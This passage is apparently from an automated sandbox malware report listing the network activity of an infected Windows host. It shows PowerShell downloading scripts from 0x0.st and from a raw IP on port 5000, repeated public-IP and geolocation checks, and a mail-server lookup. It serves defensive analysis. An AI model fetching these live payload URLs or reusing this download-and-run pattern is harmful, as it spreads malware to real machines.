                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.200.149.104
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848DB6381 URLDownloadToFileW,4_2_00007FF848DB6381
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/nova_kaycee.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.200.149.104:5000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: 0x0.st
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: mail.privateemail.com
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbs
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbs#Q.
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsC:
                  Source: powershell.exe, 00000004.00000002.2289800081.0000012971367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsLMEMhH
                  Source: powershell.exe, 00000004.00000002.2286656043.00000129710DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/download/nova_kaycee.vbsnP
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.200.149.104:5000/downlx
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A917000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A39A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
